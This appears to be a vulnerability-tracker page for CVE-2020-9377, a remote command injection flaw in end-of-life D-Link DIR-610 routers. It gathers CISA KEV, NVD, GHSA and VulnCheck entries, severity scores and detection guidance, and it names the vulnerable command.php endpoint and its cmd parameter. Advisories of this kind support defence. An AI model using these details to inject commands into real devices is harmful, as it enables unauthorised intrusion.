CVE-2020-9377
published 2020-07-09CVE-2020-9377: D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer…
PriorityP184high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
21.34%
97.3th percentile
D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting 'command.php' on D-Link DIR-610 devices, specifically inspecting the 'cmd' parameter for shell command injection payloads. ↗
- →Any inbound request to 'command.php' with a populated 'cmd' parameter should be treated as a high-confidence exploitation attempt against CVE-2020-9377. ↗
- ·This vulnerability only affects D-Link DIR-610 devices, which are end-of-life and no longer supported by the maintainer. Detection efforts should be scoped accordingly. ↗
- ·CISA flags this as a Known Exploited Vulnerability (KEV), indicating active in-the-wild exploitation. Any DIR-610 still in use should be treated as a critical risk asset. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
D-Link DIR-610 Devices Remote Command Execution
cisa·2022-03-25·CVSS 8.8
CVE-2020-9377 [HIGH] CWE-78 D-Link DIR-610 Devices Remote Command Execution
Vulnerability: D-Link DIR-610 Devices Remote Command Execution
Affected: D-Link DIR-610 Devices
D-Link DIR-610 devices allow remote code execution via the cmd parameter to command.php.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-9377
Remediation Due Date: 2022-04-15
GHSA
GHSA-mvq3-fgc2-44m7: ** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command
ghsa_unreviewed·2022-05-24
CVE-2020-9377 [MEDIUM] CWE-78 GHSA-mvq3-fgc2-44m7: ** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command
** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
VulnCheck
D-Link DIR-610 Devices Remote Command Execution
vulncheck·2020·CVSS 8.8
CVE-2020-9377 [HIGH] CWE-78 D-Link DIR-610 Devices Remote Command Execution
D-Link DIR-610 Devices Remote Command Execution
D-Link DIR-610 devices allow remote code execution via the cmd parameter to command.php.
Affected: D-Link DIR-610 Devices
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github; https://www.fortiguard.com/threat-signal-report/4389/botenago-malware-targets-multiple-iot-devices; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://gist.github.com/GouveaHeitor/131557f9de7d571f118f59805df852dchttps://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182https://www.dlink.com.br/produto/dir-610/https://gist.github.com/GouveaHeitor/131557f9de7d571f118f59805df852dchttps://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182https://www.dlink.com.br/produto/dir-610/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-9377
2020-07-09
Published
2022-03-25
Added to CISA KEV
Exploited in the wild